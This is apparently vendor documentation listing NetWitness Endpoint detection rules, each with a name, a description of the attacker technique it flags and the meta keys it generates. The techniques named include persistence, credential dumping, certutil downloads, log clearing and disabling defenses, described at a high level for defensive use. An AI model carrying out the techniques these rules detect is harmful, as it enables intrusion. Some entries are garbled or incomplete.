RSA Application Rules for Endpoint

Document created by RSA Information Design and Development on Feb 14, 2020Last modified by RSA Information Design and Development on Feb 14, 2020
Version 2Show Document
  • View in full screen mode
 

The following table lists the RSA Application Rules for NetWitness Endpoint.

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          
Display NameFile NameDescription
Accesses Administrative Share Using Command Shellaccesses_administrative_share_using_command_shellAccessing administrative share using command shell can be an indicator of someone trying for lateral movement or privilege escalation by using hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. This rule is supported for Windows 8 and higher versions.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = accesses administrative share using command shell
Activates BITS Jobactivates_bits_jobBackground Intelligent Transfer Service (BITS) is a Windows component used to transfer files. It has commonly been used for malware distribution.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* ioc = activates bits job
Adds Files To BITS Download Jobadds_files_to_bits_download_jobBackground Intelligent Transfer Service (BITS) is a Windows component used to transfer files. It has commonly been used for malware distribution.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* ioc = adds files to bits download job
Adds Firewall Ruleadds_firewall_ruleAdding firewall rule can be a indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = adds firewall rule
Allocates Remote Memoryallocates_remote_memoryIn Mac, a process not signed by Apple has allocated memory in another process. Most allocations will only occur within the same process and by processes signed by Apple. This generally indicates an attempt to inject code or data into another process, which may be a first step in reinforcing a malicious presence on a system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = allocates remote memory
Antivirus Disabledantivirus_disabledDisabling antivirus can be a indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = antivirus disabled
Archiving Software Reads Multiple Documentsarchiving_software_reads_multiple_documentsMultiple documents read could be an indication of someone creating a large archive.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = archiving software reads multiple documents
AutorunautorunIndicates applications or commands that are configured to run on system startup.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = autorun
Autorun File Path Not Part Of RPMautorun_file_path_not_part_of_rpmInstallation or updates of software on Linux systems is typically done through an RPM. Executables outside of this packing format could be considered suspicious.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = autorun file path not part of rpm
Autorun Invalid Signature Windows Directoryautorun_invalid_signature_windows_directoryThis rule will return any file with an invalid signature located in the following Windows directories: C:\\ProgramData, C:\\Users\\<user>\\AppData\\Roaming, C:\\Users\\<user>\\AppData\\Local, C:\\Windows

VERSIONS SUPPORTED
* NetWitness Platform 11.3 (Investigation Only)
* NetWitness Platform 11.4 and higher (Full Support)

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = autorun invalid signature windows directory
Autorun Key Contains Non-Printable Charactersautorun_key_contains_non-printable_charactersAutorun key containing non-printable characters an indication of someone trying to use startup configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* ioc = autorun key contains non-printable characters
Autorun RPM Mismatchautorun_rpm_mismatchA hash mismatch may indicate a file has been altered from its original state and call into question its integrity. Since RPMs typically contain compiled software this could mean an attacker is trying to disguise malicious malware as legitimate.
Autorun Unsigned Active Setupautorun_unsigned_active_setupActive Setup is a mechanism for executing commands once per user early during login and executed by explorer.exe. To ensure persistence across reboots and log-offs attackers use active setup which is even more suspicious when it is unsigned.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = autorun unsigned active setup
Autorun Unsigned AppInit_DLLsautorun_unsigned_appinit_dllsUnsigned Autorun AppInit_DLLs can be an indiaction of attacker trying to abused registry key values for DLLs to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = autorun unsigned appinit_dlls
Autorun Unsigned BHOautorun_unsigned_bhoBHOs can be used to monitor user browsing habits and deliver targeted advertising as well as steal information. BHOs Unsigned and configured to run on system startup are used for persistence and are suspicious.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = autorun unsigned bho
Autorun Unsigned BootExecute Registry Startup Methodautorun_unsigned_bootexecute_registry_startup_methodUnsigned Autorun BootExecute registry startup method an indication of someone trying to use startup configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = autorun unsigned bootexecute registry startup method
Autorun Unsigned Explorer Registry Startup Methodautorun_unsigned_explorer_registry_startup_methodUnsigned Autorun explorer registry startup method an indication of someone trying to use startup configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = autorun unsigned explorer registry startup method
Autorun Unsigned Hiddenautorun_unsigned_hiddenAdversaries can use this to their advantage to hide files and folders anywhere on the system for persistence and evasion. To ensure persistence across reboots attackers configure to run those on system startup which is even more suspicious when it is unsigned.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = autorun unsigned hidden
Autorun Unsigned Hidden Only Executable In Directoryautorun_unsigned_hidden_only_executable_in_directoryThis rule will return any unsigned executable file launched as an autorun which has the "Hidden" Windows Property.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 (Investigation Only)
* NetWitness Platform 11.4 and higher (Full Support)

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = autorun unsigned hidden only executable in directory
Autorun Unsigned IE Toolbarautorun_unsigned_ie_toolbarToolbar can be spyware or adware which can breach privacy and steal data through browsers. To ensure persistence across reboots attackers configure to run those on system startup which is even more suspicious when it is unsigned.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = autorun unsigned ie toolbar
Autorun Unsigned In AppDataLocal Directoryautorun_unsigned_in_appdatalocal_directoryThis rule looks for any registry logon autoruns (HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce and \\Run keys) that have actions pointing at files running out of AppData/Local/Temp on Windows systems. These locations are used often by malware authors to store malicious payloads, with autoruns in place to ensure persistence.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = autorun unsigned in appdatalocal directory
Autorun Unsigned In AppDataRoaming Directoryautorun_unsigned_in_appdataroaming_directoryThis rule looks for any registry logon autoruns (HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce and \\Run keys) that have actions pointing at files running out of AppData/Roaming on Windows systems. These locations are used often by malware authors to store malicious payloads, with autoruns in place to ensure persistence.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = autorun unsigned in appdataroaming directory
Autorun Unsigned In ProgramData Directoryautorun_unsigned_in_programdata_directoryThis rule looks for any registry logon autoruns (HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce and \\Run keys) that have actions pointing at files running out of ProgramData directory on Windows systems. These locations are used often by malware authors to store malicious payloads, with autoruns in place to ensure persistence.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = autorun unsigned in programdata directory
Autorun Unsigned In Temp Directoryautorun_unsigned_in_temp_directoryThis rule looks for any registry logon autoruns (HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce and \\Run keys) that have actions pointing at files running out of Temp directory on Windows systems. These locations are used often by malware authors to store malicious payloads, with autoruns in place to ensure persistence.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = autorun unsigned in temp directory
Autorun Unsigned LogonType Registry Startup Methodautorun_unsigned_logontype_registry_startup_methodUnsigned Autorun LogonType registry startup method an indication of someone trying to use startup configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = autorun unsigned logontype registry startup method
Autorun Unsigned LSA Providerautorun_unsigned_lsa_providerWindows Authentication Package (AP) DLLs are loaded by the Local Security Authority (LSA) process at system start. Attackers can introduce their own APs to control logon processes and security protocols to OS. To ensure persistence across reboots attackers configure to run those on system startup which is even more suspicious when it is unsigned.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = autorun unsigned lsa provider
Autorun Unsigned ServiceDLLautorun_unsigned_servicedllTo evade defense, DLLs can be run as a service. This technique is used by attackers to hide the malware. To ensure persistence across reboots attackers configure to run those on system startup which is even more suspicious when it is unsigned.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = autorun unsigned servicedll
Autorun Unsigned Winlogon Helper DLLautorun_unsigned_winlogon_helper_dllThis rule is looking for instance of modifications in Winlogon registry keys that may cause Winlogon to load and execute malicious unsigned DLLs. Adversaries may take advantage of this feature to load adversarial code at startup for persistence.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 (Investigation Only)
* NetWitness Platform 11.4 and higher (Full Support)

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = autorun unsigned winlogon helper dll
Autorun Unsigned Winsock LSPautorun_unsigned_winsock_lspWinsock LSP is a DLL that is loaded when a process uses Winsock API, it allows us to inject our code between the user network calls and the Winsock API, thus allowing attacker to inspect, modify, or block those network calls. To ensure persistence across reboots attackers configure to run those on system startup which is even more suspicious when it is unsigned.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = autorun unsigned winsock lsp
Bad Certificate Warning Disabledbad_certificate_warning_disabledDisabling bad certificate warning can be an indication of an adversary attempting to block indicators or event notifications, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = bad certificate warning disabled
Blacklisted Fileblacklisted_fileAn analyst may mark files as blacklisted within NetWitness Endpoint. If actions on an endpoint involve those blacklisted files as the source, then this rule will trigger.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = blacklisted file
Browser Runs Command Promptbrowser_runs_command_promptThis will return any child processes of 'cmd.exe' that have been spawned by the the parent process of either, 'chrome.exe','iexplorer.exe','opera.exe' or 'firefox.exe'.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 (Investigation Only)
* NetWitness Platform 11.4 and higher (Full Support)

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = browser runs command prompt
Browser Runs Mshtabrowser_runs_mshtaMshta.exe executes Microsoft HTML Applications (HTA). Attackers can use mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. It is suspicious for a browser to run Mshta.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = browser runs mshta
Browser Runs Powershellbrowser_runs_powershellBrowser running powershell can be an indication of someone trying to run web based malicious commands using browsers to compromise the system or the user, which can be further used to gain access, to do lateral movement or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = browser runs powershell
Builds Script Incrementallybuilds_script_incrementallyBuilding script incrementally can be an indication of attacker trying to execute serias of commands using script, which can be further used to gain access, to do lateral movement or to gain elevated privileges. Attackers may take advantage of this to avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = builds script incrementally
Clears Security Event Logclears_security_event_logClearing security event log can be a strong indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = clears security event log
Clears System Event Logclears_system_event_logClearing security system log can be a indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = clears system event log
Combines Binaries Using Command Promptcombines_binaries_using_command_promptChaining binaries using command prompt can be an indication of someone trying to run multiple malicious commands needed to perform multi-stage attack to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = combines binaries using command prompt
Command Line Usage Of Archiving Softwarecommand_line_usage_of_archiving_softwareUse of the command line to create archive files demonstrates more advanced use of the tools and is atypical.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = command line usage of archiving software
Command Line Writes Script Filescommand_line_writes_script_filesThis rule will return any 'cmd.exe' or 'powershell.exe' that will write out any file with the extensions 'vbs', 'vbe', 'wsh', 'wsf', 'vb', 'cmd' or 'bat'. Scripts can be used for Defense Evasion as well as Execution by adversaries.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 (Investigation Only)
* NetWitness Platform 11.4 and higher (Full Support)

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = command line writes script files
Command Prompt Obfuscationcommand_prompt_obfuscationCommand Prompt (cmd) in Windows can be used to perform a number of tasks including execution of other software. Adversaries can run obfuscated commands on cmd for execution to evade defense mechanisms. Obfuscated commands can evade signature based defenses.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 (Investigation Only)
* NetWitness Platform 11.4 and higher (Full Support)

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = command prompt obfuscation
Command Prompt Obfuscation Using Value Extractioncommand_prompt_obfuscation_using_value_extractionCommand Prompt (cmd) in Windows can be used to perform a number of tasks including execution of other software. Adversaries can run obfuscated commands on cmd by extracting strings from environment variables for execution to evade defense mechanisms. Obfuscated commands can evade signature based defenses.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 (Investigation Only)
* NetWitness Platform 11.4 and higher (Full Support)

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = command prompt obfuscation using value extraction
Command Shell Copy Itemscommand_shell_copy_itemsThis will return any console event of 'cmd.exe' or 'powershell.exe' running a copy command.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 (Investigation Only)
* NetWitness Platform 11.4 and higher (Full Support)

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = command shell copy items
Command Shell Runs Rundll32command_shell_runs_rundll32This will return any instance of 'cmd.exe' or 'powershell.exe' launching the Windows OS processes of 'rundll32.exe' with no arguments

VERSIONS SUPPORTED
* NetWitness Platform 11.3 (Investigation Only)
* NetWitness Platform 11.4 and higher (Full Support)

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* ioc = command shell runs rundll32
Completes BITS Download Jobcompletes_bits_download_jobBackground Intelligent Transfer Service (BITS) is a Windows component used to transfer files. It has commonly been used for malware distribution.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* ioc = completes bits download job
Configures Image Hijackingconfigures_image_hijackingImage File Execution Options (IFEO) enable a developer to attach a debugger to an application. Value of the debugger process can be abused to obtain persistence and privilege escalation by causing a malicious executable to be loaded and by continuous invocation. Malware may also use IFEO for Defense Evasion by registering invalid debuggers that redirect and effectively disable various system and security applications

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* ioc = configures image hijacking
Configures Port Redirectionconfigures_port_redirectionConfiguring port redirection can be indication of adversaries can be using connection to manage command and control communications, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = configures port redirection
Copies Binary Over Administrative Sharecopies_binary_over_administrative_shareAdministrative shares once compromised could be used to distribute malware.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = copies binary over administrative share
Created In Last Monthcreated_in_last_monthFiles created in the last month may be reviewed for malicious intent.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = created in last month
Creates Browser Extensioncreates_browser_extensionBrowser extensions or plugins are small programs that can add functionality and customize aspects of internet browsers. Malicious extensions once installed can browse to websites in the background, steal all information that a user enters into a browser and be used as an installer for a RAT for persistence.
Creates Domain User Accountcreates_domain_user_accountCreating domain user account can be an indication of adversaries with a sufficient level of access creating a domain user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = creates domain user account
Creates Executable In Startup Directorycreates_executable_in_startup_directoryCreating executable in startup directory can an indication of someone trying to use startup configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = creates executable in startup directory
Creates Local Driver Servicecreates_local_driver_serviceCreating local driver service can be an indication of someone trying to maintain a persistent access on the system using driver services which can execute under SYSTEM privileges, modify the registry and create back

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = creates local driver service
Creates Local Servicecreates_local_serviceCreating local service can be an indication of someone trying to maintain a persistent presence on the system using local services which can modify the registry, escalate privileges and create backdoor.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = creates local service
Creates Local Taskcreates_local_taskCreating local task can be an indication of someone trying to use task scheduling to execute programs at system startup or on a scheduled basis for persistence, to conduct remote execution as part of lateral movement, to gain SYSTEM privileges, or to run a process under the context of a specified account.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = creates local task
Creates Local User Accountcreates_local_user_accountCreating local user account can be an indication of adversaries with a sufficient level of access creating a local user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = creates local user account
Creates Password-Protected Archivecreates_password-protected_archivePassword-protected archive files can be used to exfiltrate sensitive data since contents cannot be examined.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = creates password-protected archive
Creates Recursive Archivecreates_recursive_archiveCreating a recursive archive could be an attempt to exfiltrate many files at once.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = creates recursive archive
Creates Remote Process Using WMI Command-Line Toolcreates_remote_process_using_wmi_command-line_toolCreating remote process using WMI command-line tool can be an indication of someone trying to use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for discovery and remote execution of files as part of Lateral Movement.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = creates remote process using wmi command-line tool
Creates Remote Servicecreates_remote_serviceCreating remote service can be an indication of someone trying to maintain a persistent presence on the system using remote services which can modify the registry, escalate privileges and create backdoor.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = creates remote service
Creates Remote Taskcreates_remote_taskCreating remote task can be an indication of someone trying to use task scheduling to execute programs at system startup or on a scheduled basis for persistence, to conduct remote execution as part of lateral movement, to gain SYSTEM privileges, or to run a process under the context of a specified account.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = creates remote task
Creates Shadow Volume For Logical Drivecreates_shadow_volume_for_logical_driveCreating shadow volume for logical drive can be indication of someone trying to dump credentials using shadow backup copies of systems to be able to Creates remote taskCreates remote taskgain a privileged foothold, allowing them unfettered access to elevate privileges and move about the network freely without detection.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = creates shadow volume for logical drive
Creates Suspicious Service Running Command Promptcreates_suspicious_service_running_command_promptCreates suspicious service running command prompt can be an indication of someone trying to create and run malicious services to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges. Attackers may take advantage of this to proxy execution of code to avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = creates suspicious service running command prompt
Deletes Backup Catalogdeletes_backup_catalogDeleting backup catalog can be an indication of someone is trying to remove files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = deletes backup catalog
Deletes Firewall Ruledeletes_firewall_ruleDeleting firewall rule can be a indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = deletes firewall rule
Deletes Shadow Volume Copiesdeletes_shadow_volume_copiesDeleting shadow volume copies can be an indication of someone is trying to removefiles over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = deletes shadow volume copies
Deletes USN Change Journaldeletes_usn_change_journalDeleting USN change journal can be a indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = deletes usn change journal
Disables Firewalldisables_firewallDisabling firewall can be a indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = disables firewall
Disables Security Servicedisables_security_serviceDisabling security service can be a indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = disables security service
Disables Startup Repairdisables_startup_repairDisabling startup repair can be an indication of someone is trying to remove files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = disables startup repair
Disables UACdisables_uacEvent viewer executing uncommon binary can be an indication of possible Windows User Account Control (UAC) bypass. Attacker can use these techniques to elevate privileges to administrator if the target process is unprotected. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = disables uac
Disables UAC Remote Restrictionsdisables_uac_remote_restrictionsDisabling UAC remote restrictions can be an attempt to bypass Windows User Account Control (UAC). Attacker can use these techniques to elevate privileges to administrator if the target process is unprotected. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = disables uac remote restrictions
Disables Windows Defender Using Powershelldisables_windows_defender_using_powershellDisabling windows defender using powershell can be a indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = disables windows defender using powershell
Downloads Binary Using Certutildownloads_binary_using_certutilWindows certificate managing utility program - CertUtil can install, backup, delete, manage, and perform various functions related to certificates and certificate stores in Windows. Downloading binary using certutil can be an indication of someone trying to download malicious code to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = downloads binary using certutil
Drops Credential Dumping Toolsdrops_credential_dumping_toolsDropping credential dumping tools can be indication of someone trying to bypass all credentials checks to be able to gain a privileged foothold, allowing them unfettered access to elevate privileges and move about the network freely without detection.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* ioc = drops credential dumping library
Dumps DNS Cachedumps_dns_cacheDumping DNS cache can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = dumps dns cache
Dyld Inserteddyld_insertedmacOS and OS X use a common method to look for required dynamic libraries (dylib) to load into a program based on search paths. Adversaries can take advantage of ambiguous paths to plant dylibs to gain privilege escalation or persistence.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = dyld inserted
Enables Cleartext Credential Storageenables_cleartext_credential_storageEnabling cleartext credential storage can be indication of someone trying to exploit these credentials to be able to gain a privileged foothold, allowing them unfettered access to elevate privileges and move about the network freely without detection.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = enables cleartext credential storage
Enables Login Bypassenables_login_bypassAccessibility features that may be launched with a key combination before a user has logged in . Enabling login bypass can be an indicator of someone trying to modify the way these programs are launched to maintain a persistent presence on the system which can escalate privileges and create backdoor without logging in to the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* ioc = enables login bypass
Enables RDP From Command-Lineenables_rdp_from_command-lineEnabling RDP from command-line can be indication of adversaries trying to connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries may also use RDP in conjunction with the Accessibility Features technique for Persistence or perform RDP session hijacking which involves stealing a legitimate user's remote session.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
